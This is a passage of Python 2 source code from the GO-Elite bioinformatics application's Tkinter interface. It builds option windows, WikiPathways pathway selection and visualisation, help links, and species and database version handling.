lb = Label(self.parent_type, text=self.notes,fg="black"); lb.pack(pady = 5)
### Create and pack a horizontal RadioSelect widget
def custom_validate(tag,custom_validate=self.custom_validate,option=self.option):
validate = custom_validate(tag,self.option)
self.entry_field = PmwFreeze.EntryField(self.parent_type,
labelpos = 'w', label_text = self.title, validate = custom_validate,
value = self.default_option, hull_borderwidth = 2)
self.entry_field.pack(fill = 'x', expand = 0.7, padx = 10, pady = 5)
def displayPathway(self):
filename = self._user_variables['goelite_input_file']
mod_type = self._user_variables['mod_wp']
species = self._user_variables['species_wp']
pathway_name = self._user_variables['wp_id_selection']
wpid_selected = self._user_variables['wp_id_enter']
species_code = species_codes[species].SpeciesCode()
wpid = None
if len(wpid_selected)>0:
wpid = wpid_selected
elif len(self.pathway_db)>0:
for wpid in self.pathway_db:
if pathway_name == self.pathway_db[wpid].WPName():
break
if len(filename)==0:
print_out = 'Select an input ID file with values first'
WarningWindow(print_out,'Error Encountered!')
else:
try:
self.graphic_link = WikiPathways_webservice.visualizePathwayAssociations(filename,species_code,mod_type,wpid)
self.wp_status = 'Pathway images colored and saved to disk by webservice\n(see image title for location)'
self.label_status_name.set(self.wp_status)
try: self.viewPNGFile() ### ImageTK PNG viewer
except Exception:
try: self.openPNGImage() ### OS default PNG viewer
except Exception:
self.wp_status = 'Unable to open PNG file using operating system'
self.label_status_name.set(self.wp_status)
except Exception,e:
try:
wp_logfile = filepath('webservice.log')
wp_report = open(wp_logfile,'a')
wp_report.write(traceback.format_exc())
except Exception:
None
try:
print traceback.format_exc()
except Exception:
null=None ### Occurs when transitioning back from the Official Database download window (not sure why) -- should be fixed in 1.2.5 (sys.stdout not re-routed)
if 'force_no_matching_error' in traceback.format_exc():
print_out = 'None of the input IDs mapped to this pathway'
elif 'force_invalid_pathway' in traceback.format_exc():
print_out = 'Invalid pathway selected'
elif 'IndexError' in traceback.format_exc():
print_out = 'Input ID file does not have at least 3 columns, with the second column being system code'
elif 'ValueError' in traceback.format_exc():
print_out = 'Input ID file error. Please check that you do not have extra rows with no data'
elif 'source_data' in traceback.format_exc():
print_out = 'Input ID file does not contain a valid system code'
else:
print_out = 'Error generating the pathway "%s"' % pathway_name
WarningWindow(print_out,'Error Encountered!')
def getSpeciesPathways(self,species_full):
pathway_list=[]
self.pathway_db = WikiPathways_webservice.getAllSpeciesPathways(species_full)
for wpid in self.pathway_db:
pathway_list.append(self.pathway_db[wpid].WPName())
pathway_list = unique.unique(pathway_list)
pathway_list.sort()
return pathway_list
def callbackWP(self, tag, option):
#print 'Button',[option], tag,'was pressed.'
self._user_variables[option] = tag
if option == 'species_wp':
### Add additional menu options based on user selection
if tag != '---':
### If this already exists from an earlier iteration
hault = False
self.label_name.set('Loading available WikiPathways')
try:
self.pathway_list=self.getSpeciesPathways(tag)
traceback_printout = ''
except Exception,e:
if 'not supported' in traceback.format_exc():
print_out = 'Species not available at WikiPathways'
WarningWindow(print_out,'Species Not Found!')
traceback_printout=''
hault = True
elif 'URLError' in traceback.format_exc():
print_out = 'Internet connection could not be established'
WarningWindow(print_out,'Internet Error')
traceback_printout=''
hault = True
else:
traceback_printout = traceback.format_exc()
try:
if len(self.pathway_list)>0: ### When true, a valid species was selected in a prior interation invoking the WP fields (need to repopulate)
hault = False
except Exception: None
self.pathway_list = ['None']; self.pathway_db={}
self.label_name.set('')
if hault == False:
try:
### If the species specific wikipathways drop down exists, just update it
self.wp_dropdown._list.setlist(self.pathway_list)
self.wp_dropdown.selectitem(self.pathway_list[0])
self.callbackWP(self.pathway_list[0],'wp_id_selection')
except Exception:
### Create a species specific wikipathways drop down
self.option = 'wp_id_selection'
self.title = 'Select WikiPathways to visualize your data'
if len(traceback_printout)>0:
self.title += traceback_printout ### Display the actual problem in the GUI (sloppy but efficient way for users to indicate the missing driver)
self.options = self.pathway_list
self.default_option = 0
self.comboBox() ### Better UI for longer lists of items (dropDown can't scroll on Linux)
### Create a species specific wikipathways ID enter option
self.notes = 'OR'
self.option = 'wp_id_enter'
self.title = 'Enter the WPID (example: WP254) '
self.default_option = ''
self.enterMenu()
try:
### Create a label that can be updated below the dropdown menu
self.wp_status = 'Pathway image may take several seconds to a minute to load...\n'
self.wp_status += '(images saved to "WikiPathways" folder in input directory)'
try: self.label_status_name.set(self.wp_status)
except Exception:
self.label_status_name = StringVar()
self.label_status_name.set(self.wp_status)
self.invokeStatusLabel() ### Invoke a new label indicating that the database is loading
except Exception:
None
if option == 'wp_id_selection':
### Reset any manually input WPID if a new pathway is selected from dropdown
try: self.entry_field.setentry('')
except Exception: null=[]
def viewPNGFile(self):
""" View PNG file within a PMW Tkinter frame """
import ImageTk ### HAVE TO CALL HERE TO TRIGGER AN ERROR - DON'T WANT THE TopLevel to open otherwise
png_file_dir = self.graphic_link['WP']
img = ImageTk.PhotoImage(file=png_file_dir)
tl = Toplevel()
sf = PmwFreeze.ScrolledFrame(tl, labelpos = 'n', label_text = '',
usehullsize = 1, hull_width = 800, hull_height = 550)
sf.pack(padx = 0, pady = 0, fill = 'both', expand = 1)
frame = sf.interior()
tl.title(png_file_dir)
can = Canvas(frame)
can.pack(fill=BOTH, padx = 0, pady = 0)
w = img.width()
h = height=img.height()
can.config(width=w, height=h)
can.create_image(2, 2, image=img, anchor=NW)
tl.mainloop()
def openPNGImage(self):
png_file_dir = self.graphic_link['WP']
if os.name == 'nt':
try: os.startfile('"'+png_file_dir+'"')
except Exception: os.system('open "'+png_file_dir+'"')
elif 'darwin' in sys.platform: os.system('open "'+png_file_dir+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+png_file_dir+'"')
def __init__(self, parent, option_db, option_list):
self._parent = parent; self._option_list = option_list
self._user_variables = user_variables
self.default_dir = PathDir; self.default_file = PathFile
self.option_db = option_db
filename = 'Config/icon.gif'
fn=filepath(filename); img = PhotoImage(file=fn)
can = Canvas(parent); can.pack(side='top'); can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
self.pathdb={}; use_scroll = 'no'
label_text_str = "\nGO-Elite Program Options"
if os.name == 'nt': height = 400; width = 420
else: height = 350; width = 480
if option_db == 'ViewWikiPathways': width = 520
use_scroll = 'yes'
if 'run_from_scratch' in option_list or 'modifyDBs1' in option_list:
if 'modifyDBs1' in option_list and os.name != 'nt': width = 460; height = 350
else: width = 400; height = 325
if 'selected_species3' in option_list:
height -= 30
if os.name != 'nt':height+=50; width+=50
self.sf = PmwFreeze.ScrolledFrame(self._parent,
labelpos = 'n', label_text = label_text_str,
usehullsize = 1, hull_width = width, hull_height = height)
self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
self.frame = self.sf.interior()
parent_type = self.frame
self.parent_type = parent_type
i = 0; object_directions = ['top','bottom','up','down']
if option_db == 'ViewWikiPathways':
self.ViewWikiPathways()
for option in option_list:
if option in self.option_db:
od = self.option_db[option]; self.title = od.Display(); description = od.Description()
self.display_options = od.AnalysisOptions()
if 'radio' in od.DisplayObject() and self.display_options != ['NA']:
### Create and pack a RadioSelect widget, with radiobuttons.
self._option = option
def radiocallback(tag,callback=self.callback,option=option): callback(tag,option)
radiobuttons = PmwFreeze.RadioSelect(parent_type,
buttontype = 'radiobutton', orient = 'vertical',
labelpos = 'w', command = radiocallback, label_text = self.title,
hull_borderwidth = 2, hull_relief = 'ridge',
);
if description in object_directions: direction = description ### can be used to store directions
else: direction = 'top'
radiobuttons.pack(side = direction, expand = 1, padx = 10, pady = 5)
### print self.display_options
### Add some buttons to the radiobutton RadioSelect.
for text in self.display_options:
if text != ['NA']: radiobuttons.add(text)
self.default_option = od.DefaultOption()
radiobuttons.invoke(self.default_option)
if 'button' in od.DisplayObject() and self.display_options != ['NA']:
self._option = option
### Create and pack a horizontal RadioSelect widget.
self.default_option = od.DefaultOption()
if mac_print_mode == 'yes':
button_type = 'radiobutton'
if self._option == 'run_from_scratch':
self.title = self.title[:int(len(self.title)/1.8)] ### On a mac, the spaced text is too far out
if self._option == 'modifyDBs1':
self.title = self.title[:int(len(self.title)/1.3)] ### On a mac, the spaced text is too far out
else: button_type = 'button'
def buttoncallback(tag,callback=self.callback,option=option):
callback(tag,option)
horiz = PmwFreeze.RadioSelect(parent_type, buttontype = button_type, orient = 'vertical',
labelpos = 'w', command = buttoncallback,
label_text = self.title, frame_borderwidth = 2,
frame_relief = 'ridge'
); horiz.pack(fill = 'x', padx = 10, pady = 10)
### Add some buttons to the horizontal RadioSelect
for text in self.display_options:
if text != ['NA']: horiz.add(text)
horiz.invoke(self.default_option)
if ('folder' in od.DisplayObject() or 'file' in od.DisplayObject()) and self.display_options != ['NA']:
proceed = 'yes'
if option == 'mappfinder_dir' and run_mappfinder == 'yes': proceed = 'no'
if proceed == 'yes':
self._option = option
if option == 'output_dir':
if run_mappfinder == 'no':
notes = ""#"note: if not selected, 'input/MAPPFinder' will\nbe used and results written to 'output/' "
self.title = string.replace(self.title,'output','pre-computed ORA')
else: notes = od.Description()
else: notes = od.Description()
group = PmwFreeze.Group(parent_type,tag_text = self.title)
group.pack(fill = 'both', expand = 1, padx = 10, pady = 2)
def filecallback(callback=self.callback,option=option): self.getPath(option)
entrytxt = StringVar(); #self.entrytxt.set(self.default_dir)
default_option = string.replace(od.DefaultOption(),'---','')
entrytxt.set(default_option)
self.pathdb[option] = entrytxt
self._user_variables[option] = default_option
#l = Label(group.interior(), text=self.title); l.pack(side=LEFT)
entry = Entry(group.interior(),textvariable=self.pathdb[option]);
entry.pack(side='left',fill = 'both', expand = 1, padx = 10, pady = 2)
button = Button(group.interior(), text="select "+od.DisplayObject(), width = 10, fg="red", command=filecallback)
button.pack(side=LEFT, padx = 2,pady = 2)
#print option,run_mappfinder, self.title, self.default_option
if len(notes)>0: ln = Label(parent_type, text=notes,fg="blue"); ln.pack(padx = 10)
if 'drop-down' in od.DisplayObject() and self.display_options != ['NA']:
self._option = option
self.default_option = self.display_options
def comp_callback1(tag,callback=self.callback,option=option):
callback(tag,option)
self.comp = PmwFreeze.OptionMenu(parent_type,
labelpos = 'w', label_text = self.title,
items = self.default_option, command = comp_callback1)
if 'species' in option:
if 'selected_species2' in option:
self.speciescomp2 = self.comp; self.speciescomp2.pack(anchor = 'w', padx = 10, pady = 0)
elif 'selected_species3' in option:
self.speciescomp3 = self.comp; self.speciescomp3.pack(anchor = 'w', padx = 10, pady = 0)
else: self.speciescomp = self.comp; self.speciescomp.pack(anchor = 'w', padx = 10, pady = 0)
try: self.speciescomp.invoke(od.DefaultOption()) ###Just pick the first option
except Exception: self.speciescomp.invoke(self.default_option[0])
else:
self.comp.pack(anchor = 'w', padx = 10, pady = 0)
try: self.comp.invoke(od.DefaultOption()) ###Just pick the first option
except Exception: self.comp.invoke(self.default_option[0])
if len(od.Description())>0 and od.Description() != 'top':
ln = Label(parent_type, text=od.Description(),fg="blue"); ln.pack(padx = 10)
if option == 'selected_version':
notes = 'Note: Available species may vary based on database selection and\n'
notes+= '"Plus" versions have additional Affymetrix & EntrezGene relationships\n'
ln = Label(parent_type, text=notes,fg="blue"); ln.pack(padx = 10)
if 'comboBox' in od.DisplayObject() and self.display_options != ['NA']:
self._option = option
self.default_option = self.display_options
def comp_callback1(tag,callback=self.callbackComboBox,option=option):
callback(tag,option)
self.comp = PmwFreeze.ComboBox(parent_type,
labelpos = 'w', dropdown=1, label_text = self.title,
unique = 0, history = 0,
scrolledlist_items = self.default_option,
selectioncommand = comp_callback1)
if 'species' in option:
if 'selected_species2' in option:
self.speciescomp2 = self.comp; self.speciescomp2.pack(anchor = 'w', padx = 10, pady = 0)
try: self.speciescomp2.component('entryfield_entry').bind('<Button-1>', lambda event, self=self: self.speciescomp2.invoke())
except Exception: None ### Above is a slick way to force the entry field to be disabled and invoke the scrolledlist
try:
self.speciescomp2.selectitem(od.DefaultOption())
self.callbackComboBox(od.DefaultOption(),option)
except Exception:
self.speciescomp2.selectitem(self.default_option[0]) ###Just pick the first option
self.callbackComboBox(self.default_option[0],option)
elif 'selected_species3' in option:
self.speciescomp3 = self.comp; self.speciescomp3.pack(anchor = 'w', padx = 10, pady = 0)
try: self.speciescomp3.component('entryfield_entry').bind('<Button-1>', lambda event, self=self: self.speciescomp3.invoke())
except Exception: None ### Above is a slick way to force the entry field to be disabled and invoke the scrolledlist
try:
self.speciescomp3.selectitem(od.DefaultOption()) ###Just pick the first option
self.callbackComboBox(od.DefaultOption(),option)
except Exception:
self.speciescomp3.selectitem(self.default_option[0])
self.callbackComboBox(self.default_option[0],option)
else:
self.speciescomp = self.comp; self.speciescomp.pack(anchor = 'w', padx = 10, pady = 0)
try: self.speciescomp.component('entryfield_entry').bind('<Button-1>', lambda event, self=self: self.speciescomp.invoke())
except Exception: None ### Above is a slick way to force the entry field to be disabled and invoke the scrolledlist
try:
self.speciescomp.selectitem(od.DefaultOption())
self.callbackComboBox(od.DefaultOption(),option)
except Exception:
self.speciescomp.selectitem(self.default_option[0])
self.callbackComboBox(self.default_option[0],option)
else:
self.combo = self.comp ### has to be a unique combo box to refer to itself in the component call below
self.combo.pack(anchor = 'w', padx = 10, pady = 1)
try: self.combo.component('entryfield_entry').bind('<Button-1>', lambda event, self=self: self.combo.invoke())
except Exception: None ### Above is a slick way to force the entry field to be disabled and invoke the scrolledlist
try:
self.combo.selectitem(od.DefaultOption())
self.callbackComboBox(od.DefaultOption(),option)
except Exception:
self.combo.selectitem(self.default_option[0])
self.callbackComboBox(self.default_option[0],option)
if len(od.Description())>0 and od.Description() != 'top':
ln = Label(parent_type, text=od.Description(),fg="blue"); ln.pack(padx = 10)
if option == 'selected_version':
notes = 'Note: Available species may vary based on database selection and\n'
notes+= '"Plus" versions have additional Affymetrix & EntrezGene relationships\n'
ln = Label(parent_type, text=notes,fg="blue"); ln.pack(padx = 10)
if 'label' in od.DisplayObject() and self.display_options != ['NA']:
ln = Label(parent_type, text=self.title,fg="blue"); ln.pack(padx = 10)
if 'enter' in od.DisplayObject() and self.display_options != ['NA']:
self._option = option
### Create and pack a horizontal RadioSelect widget.
self.default_option = od.DefaultOption()
#print self.default_option, self.title; kill
def custom_validate(tag,custom_validate=self.custom_validate,option=option):
validate = custom_validate(tag,option)
def custom_validate_p(tag,custom_validate_p=self.custom_validate_p,option=option):
validate = custom_validate_p(tag,option)
#print [validate], tag, option
try:
if float(self.default_option) <= 1: use_method = 'p'
else: use_method = 'i'
except ValueError:
use_method = 'i'
if use_method == 'p':
self.entry_field = PmwFreeze.EntryField(parent_type,
labelpos = 'w',
label_text = self.title,
validate = custom_validate,
value = self.default_option, hull_borderwidth = 2, hull_relief = 'ridge'
); self.entry_field.pack(fill = 'x', expand = 1, padx = 10, pady = 10)
if use_method == 'i':
self.entry_field = PmwFreeze.EntryField(parent_type,
labelpos = 'w',
label_text = self.title,
validate = custom_validate,
value = self.default_option, hull_borderwidth = 2, hull_relief = 'ridge'
); self.entry_field.pack(fill = 'x', expand = 1, padx = 10, pady = 10)
if len(od.Description())>0:
ln = Label(parent_type, text=od.Description(),fg="red"); ln.pack(padx = 10)
if 'multiple-checkbox' in od.DisplayObject() and self.display_options != ['NA']:
self._option = option
self.default_option = od.DefaultOption()
### Create and pack a vertical RadioSelect widget, with checkbuttons.
self.checkbuttons = PmwFreeze.RadioSelect(parent_type,
buttontype = 'checkbutton', orient = 'vertical',
labelpos = 'w', command = self.checkbuttoncallback,
label_text = self.title, hull_borderwidth = 2, hull_relief = 'ridge',
); self.checkbuttons.pack(side = 'top', expand = 1, padx = 10, pady = 10)
### Add some buttons to the checkbutton RadioSelect.
for text in self.display_options:
if text != ['NA']: self.checkbuttons.add(text)
self.checkbuttons.invoke(self.default_option)
self.checkbuttons.invoke(self.default_option2)
if 'single-checkbox' in od.DisplayObject() and self.display_options != ['NA']:
self._option = option
proceed = 'yes'
"""if option == 'export_splice_index_values':
if analysis_method != 'splicing-index': proceed = 'no' ### only export corrected constitutive ratios if splicing index method chosen"""
if proceed == 'yes':
self.default_option = od.DefaultOption()
if self.default_option != 'NA':
def checkbuttoncallback(tag,state,checkbuttoncallback=self.checkbuttoncallback,option=option):
checkbuttoncallback(tag,state,option)
### Create and pack a vertical RadioSelect widget, with checkbuttons. hull_relief
self.checkbuttons = PmwFreeze.RadioSelect(parent_type,
buttontype = 'checkbutton', command = checkbuttoncallback,
hull_borderwidth = 2,
); self.checkbuttons.pack(side = 'top', expand = 1, padx = 10, pady = 10)
### Add some buttons to the checkbutton RadioSelect.
self.checkbuttons.add(self.title)
if self.default_option == 'yes': self.checkbuttons.invoke(self.title)
else: self._user_variables[option] = 'no'
i+=1 ####Keep track of index
if len(option_list)>0:
if 'process_go' in option_list: ### For the CEL file selection window, provide a link to get Annotation files
button_text = 'Download Annotation CSVs'; d_url = 'http://www.affymetrix.com/support/technical/byproduct.affx?cat=arrays'
self.d_url = d_url; text_button = Button(self._parent, text=button_text, command=self.Dlinkout); text_button.pack(side = 'left', padx = 5, pady = 5)
if 'permutation' in option_list:
#ScrolledCanvas().mainloop()
systemCodes_win = Button(parent_type, text="GO-Elite Supported System Codes", command=self.systemCodes)
systemCodes_win.pack(side = 'bottom', padx = 5, pady = 5)
if 'new_species_name' in option_list:
button_text = 'Lookup Species TaxID'; d_url = 'http://www.ncbi.nlm.nih.gov/sites/entrez?db=taxonomy'
self.d_url = d_url; text_button = Button(self._parent, text=button_text, command=self.Dlinkout); text_button.pack(side = 'left', padx = 5, pady = 5)
continue_to_next_win = Button(text = 'Continue', command = self._parent.destroy)
continue_to_next_win.pack(side = 'right', padx = 10, pady = 10)
back_button = Button(self._parent, text="Back", command=self.goBack)
back_button.pack(side = 'right', padx =10, pady = 5)
quit_win = Button(self._parent, text="Quit", command=self.quit)
quit_win.pack(side = 'right', padx =10, pady = 5)
button_text = 'Help'
url = 'http://www.genmapp.org/go_elite/help_main.htm'; self.url = url
pdf_help_file = 'Documentation/GO-Elite_Manual.pdf'; pdf_help_file = filepath(pdf_help_file); self.pdf_help_file = pdf_help_file
try: help_button = Button(self._parent, text=button_text, command=self.GetHelpTopLevel); help_button.pack(side = 'left', padx = 5, pady = 5)
except Exception: help_button = Button(self._parent, text=button_text, command=self.linkout); help_button.pack(side = 'left', padx = 5, pady = 5)
self._parent.protocol("WM_DELETE_WINDOW", self.deleteWindow)
self._parent.mainloop()
def goBack(self):
self._parent.destroy()
if 'filter_method' in self._option_list: run_parameter = 'ORA',self._user_variables
else: run_parameter = 'skip'
reload(GO_Elite); GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
def GetHelpTopLevel(self):
message = ''
self.message = message; self.online_help = 'Online Documentation'; self.pdf_help = 'Local PDF File'
tl = Toplevel(); self._tl = tl; nulls = '\t\t\t\t'; tl.title('Please select one of the options')
self.sf = PmwFreeze.ScrolledFrame(self._tl,
labelpos = 'n', label_text = '',
usehullsize = 1, hull_width = 220, hull_height = 150)
self.sf.pack(padx = 10, pady = 10, fill = 'both', expand = 1)
self.frame = self.sf.interior()
group = PmwFreeze.Group(self.sf.interior(),tag_text = 'Options')
group.pack(fill = 'both', expand = 1, padx = 20, pady = 10)
l1 = Label(group.interior(), text=nulls); l1.pack(side = 'bottom')
text_button2 = Button(group.interior(), text=self.online_help, command=self.openOnlineHelp); text_button2.pack(side = 'top', padx = 5, pady = 5)
try: text_button = Button(group.interior(), text=self.pdf_help, command=self.openPDFHelp); text_button.pack(side = 'top', padx = 5, pady = 5)
except Exception: text_button = Button(group.interior(), text=self.pdf_help, command=self.openPDFHelp); text_button.pack(side = 'top', padx = 5, pady = 5)
tl.mainloop()
def openPDFHelp(self):
if os.name == 'nt':
try: os.startfile('"'+self.pdf_help_file+'"')
except Exception: os.system('open "'+self.pdf_help_file+'"')
elif 'darwin' in sys.platform: os.system('open "'+self.pdf_help_file+'"')
elif 'linux' in sys.platform: os.system('xdg-open "'+self.pdf_help_file+'"')
self._tl.destroy()
def openOnlineHelp(self):
try: webbrowser.open(self.url)
except Exception: null=[]
self._tl.destroy()
def linkout(self):
try: webbrowser.open(self.url)
except Exception: null=[]
def Dlinkout(self):
try: webbrowser.open(self.d_url)
except Exception: null=[]
def setvscrollmode(self, tag):
self.sf.configure(vscrollmode = tag)
def systemCodes(self):
selected_species = self._user_variables['species']
species_systems = getSpeciesSystems(selected_species)
GO_Elite.sourceData()
about = "System Name"+'\t\t'+"System Code"+'\t\t'+"MOD"+'\n'
system_list=[]
for system_name in system_codes:
sc = system_codes[system_name]
if system_name in species_systems: ### Restrict by species
system_list.append([system_name,sc.SystemCode(),sc.MOD()])
system_list.sort()
for (system_name,system_code,mod) in system_list:
filler = ' '; filler2=''
if os.name == 'nt':
if platform.win32_ver()[0] != 'Vista': val = 9; val2 = 14; val3 = 19
else: val = 12; val2 = 17; val3 = 20
else: val = 12; val2 = 17; val3 = 20
if os.name == 'nt':
if len(system_name)<val: filler = val2-len(system_name); filler = filler*' '+' '
if len(mod)<val: filler2 = val3-len(mod); filler2 = filler2*' '
about+= system_name+filler+'\t\t'+system_code+filler2+'\t\t'+mod+'\n'
#tkMessageBox.showinfo("Available GO-Elite System Codes",about,parent=self._parent)
dialog = PmwFreeze.TextDialog(self._parent, scrolledtext_labelpos = 'n',
title = 'GO-Elite System Codes', defaultbutton = 0,
label_text = 'Available System Information for '+selected_species)
dialog.insert('end', about)
def info(self):
tkMessageBox.showinfo("title","message",parent=self._parent)
def deleteWindow(self):
#tkMessageBox.showwarning("Quit","Use 'Quit' button to end program!",parent=self._parent)
self._parent.destroy(); sys.exit() ### just quit instead
def quit(self):
#print "quit starts"
#print "cleaning up things..."
self._parent.quit()
self._parent.destroy()
sys.exit()
#print "quit ends"
def chooseDirectory(self,option):
tag = tkFileDialog.askdirectory(parent=self._parent)
#print option,tag
self._user_variables[option] = tag
#tkFileDialog.askopenfile(parent=self._parent)
def getPath(self,option):
if 'dir' in option or 'folder' in option:
try: dirPath = tkFileDialog.askdirectory(parent=self._parent,initialdir=self.default_dir)
except Exception:
self.default_dir = ''
try: dirPath = tkFileDialog.askdirectory(parent=self._parent,initialdir=self.default_dir)
except Exception:
try: dirPath = tkFileDialog.askdirectory(parent=self._parent)
except Exception: dirPath=''
self.default_dir = dirPath
entrytxt = self.pathdb[option]
entrytxt.set(dirPath)
self._user_variables[option] = dirPath
try: file_location_defaults['PathDir'].SetLocation(dirPath)
except Exception: null = None
exportDefaultFileLocations(file_location_defaults)
### Allows the option_db to be updated for the next round (if an error is encountered)
if 'file' in option:
try: tag = tkFileDialog.askopenfile(parent=self._parent,initialdir=self.default_file)
except Exception:
self.default_file = ''
try: tag = tkFileDialog.askopenfile(parent=self._parent,initialdir=self.default_file)
except Exception:
try: tag = tkFileDialog.askopenfile(parent=self._parent)
except Exception: tag=''
try: filePath = tag.name #initialdir=self.default_dir
except AttributeError: filePath = ''
filePath_dir = string.join(string.split(filePath,'/')[:-1],'/')
self.default_file = filePath_dir
entrytxt = self.pathdb[option]
entrytxt.set(filePath)
self._user_variables[option] = filePath
try: file_location_defaults['PathFile'].SetLocation(filePath_dir)
except Exception: null = None
exportDefaultFileLocations(file_location_defaults)
def Report(self,tag,option):
output = tag
return output
def __repr__(self,tag,option): return self.Report(tag,option)
def Results(self): return self._user_variables
def custom_validate(self, text, option):
#print [option],'text:', text
self._user_variables[option] = text
try:
text = float(text);return 1
except ValueError: return -1
def custom_validate_p(self, text, option):
#print [option],'text:', text
self._user_variables[option] = text
try:
text = float(text)
if text <1:return 1
else:return -1
except ValueError:return -1
def callback(self, tag, option):
#print 'Button',[option], tag,'was pressed.'
self._user_variables[option] = tag
if option == 'ORA_algorithm':
if tag == 'Permute p-value':
try: self.entry_field.setentry('2000')
except Exception: null=[]
self._user_variables['permutation'] = '2000'
elif tag == 'Fisher Exact Test':
try: self.entry_field.setentry('NA')
except Exception: null=[]
self._user_variables['permutation'] = '0'
if option == 'dbase_version':
###Export new species info
exportDBversion(tag)
current_species_names = getSpeciesList()
### THIS TOOK FOR EVER TO FIND!!!!!! setitems of the PMW object resets the value list
if 'permutation' in self._option_list:
try: self.speciescomp.setitems(current_species_names)
except Exception: null = [] ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
else:
try: self.speciescomp.setitems(['all-supported','New Species','---']+current_species_names)
except Exception: null = [] ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
for i in self._option_list:
var = 'proceed'
if 'species' in i: ### Necessary if the user changes dbase_version and selects continue to accept the displayed species name (since it's note directly invoked)
if 'species' in self._user_variables:
if self._user_variables[i] in current_species_names: var = None
if var == 'proceed':
try: self._user_variables[i] = current_species_names[0]
except Exception: null = []
elif option == 'selected_version':
current_species_names = db_versions[tag]
current_species_names.sort()
try: self.speciescomp.setitems(['---']+current_species_names)
except Exception: null = [] ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
try: self.speciescomp2.setitems(['---']+current_species_names)
except Exception: null = [] ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
try: self.speciescomp3.setitems(['---']+current_species_names)
except Exception: null = [] ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
def callbackComboBox(self, tag, option):
""" Similiar to the above, callback, but ComboBox uses unique methods """
#print 'Button',[option], tag,'was pressed.'
self._user_variables[option] = tag
if option == 'selected_version':
current_species_names = db_versions[tag]
current_species_names.sort()
current_species_names = ['---']+current_species_names
species_option = current_species_names[0]
try:
self.speciescomp._list.setlist(current_species_names) ### This is the way we set a new list for ComboBox
### Select the best default option to display (keep existing or re-set)
if 'selected_species1' in self._user_variables: ### If this is the species downloader
species_option = 'selected_species1'
else:
for i in self._user_variables:
if 'species' in i: species_option = i
default = self.getBestDefaultSelection(species_option,current_species_names)
self.speciescomp.selectitem(default)
except Exception: None ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
try:
self.speciescomp2._list.setlist(current_species_names)
default = self.getBestDefaultSelection('selected_species2',current_species_names)
self.speciescomp2.selectitem(default)
except Exception: None ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
try:
self.speciescomp3._list.setlist(current_species_names)
default = self.getBestDefaultSelection('selected_species3',current_species_names)
self.speciescomp3.selectitem(default)
except Exception: None ### Occurs before speciescomp is declared when dbase_version pulldown is first intiated
def getBestDefaultSelection(self,option,option_list):
default = option_list[0] ### set the default to the first option listed
if option in self._user_variables:
selected = self._user_variables[option]
if selected in option_list: ### If selected species exists in the new selected version of EnsMart
default = selected
else:
self._user_variables[option] = default ### Hence, the default has changed, so re-set it
return default
def multcallback(self, tag, state):
if state: action = 'pressed.'
else: action = 'released.'
"""print 'Button', tag, 'was', action, \
'Selection:', self.multiple.getcurselection()"""
self._user_variables[option] = tag
def checkbuttoncallback(self, tag, state, option):
if state: action = 'pressed.'
else: action = 'released.'
"""print 'Button',[option], tag, 'was', action, \
'Selection:', self.checkbuttons.getcurselection()"""
if state==0: tag2 = 'no'
else: tag2 = 'yes'
#print '---blahh', [option], [tag], [state], [action], [self.checkbuttons.getcurselection()]
self._user_variables[option] = tag2
def getSpeciesList():
try: current_species_dirs = unique.read_directory('/Databases')
except Exception: ### Occurs when the version file gets over-written with a bad directory name
try:
### Remove the version file and wipe the species file
os.remove(filepath('Config/version.txt'))
raw = export.ExportFile('Config/species.txt'); raw.close()
os.mkdir(filepath('Databases'))
except Exception: null = []
elite_db_versions = returnDirectoriesNoReplace('/Databases')
try: exportDBversion(elite_db_versions[0])
except Exception: exportDBversion('')
current_species_dirs = unique.read_directory('/Databases')
current_species_names=[]
for species in species_codes:
if species_codes[species].SpeciesCode() in current_species_dirs: current_species_names.append(species)
current_species_names.sort()
return current_species_names
def exportDBversion(db_version):
today = str(datetime.date.today()); today = string.split(today,'-'); today = today[1]+'/'+today[2]+'/'+today[0]
OBO_import.exportVersionData(db_version,today,'Config/')
def getSpeciesSystems(species):
species_code = species_codes[species].SpeciesCode()
import_dir1 = '/Databases/'+species_code+'/uid-gene'
import_dir2 = '/Databases/'+species_code+'/gene-mapp'
import_dir3 = '/Databases/'+species_code+'/gene-go'
try: uid_gene_list = read_directory(import_dir1)
except Exception: uid_gene_list=[]
try: gene_mapp_list = read_directory(import_dir2)
except Exception: gene_mapp_list=[]
try: gene_go_list = read_directory(import_dir3)
except Exception: gene_go_list=[]
uid_gene_list+=gene_mapp_list+gene_go_list
systems=[]
for file in uid_gene_list:
file = string.replace(file,'.txt','')
systems += string.split(file,'-')
systems = unique.unique(systems)
return systems
class SpeciesData:
def __init__(self, abrev, species, systems, taxid):
self._abrev = abrev; self._species = species; self._systems = systems; self._taxid = taxid
def SpeciesCode(self): return self._abrev
def SpeciesName(self): return self._species
def Systems(self): return self._systems
def TaxID(self): return self._taxid
def __repr__(self): return self.SpeciesCode()+'|'+self.SpeciesName()
def importSpeciesInfo():
try:
if integrate_online_species == 'yes': filename = 'Config/species_all.txt'
else: filename = 'Config/species.txt'
except Exception: filename = 'Config/species.txt'
fn=filepath(filename); global species_list; species_list=[]; global species_codes; species_codes={}; x=0
for line in open(fn,'rU').readlines():
data = cleanUpLine(line)
try:
abrev,species,taxid,compatible_mods = string.split(data,'\t')
except Exception:
if '!DOCTYPE': print_out = "A internet connection could not be established.\nPlease fix the problem before proceeding."
else: print_out = "Unknown file error encountered."
raw = export.ExportFile(fn); raw.close(); GO_Elite.importGOEliteParameters('skip'); sys.exit()
if x==0: x=1
else:
compatible_mods = string.split(compatible_mods,'|')
species_list.append(species)
sd = SpeciesData(abrev,species,compatible_mods,taxid)
species_codes[species] = sd
return species_codes
def remoteSpeciesInfo(integrate_online):
global integrate_online_species; integrate_online_species = integrate_online; species_names={}
importSpeciesInfo()
if len(species_codes) == 0:
integrate_online_species = 'yes'
importSpeciesInfo() ### Occurs when an unknown error erases the species file
exportSpeciesInfo(species_codes) ### Re-sets this database
for species in species_codes:
sd = species_codes[species]
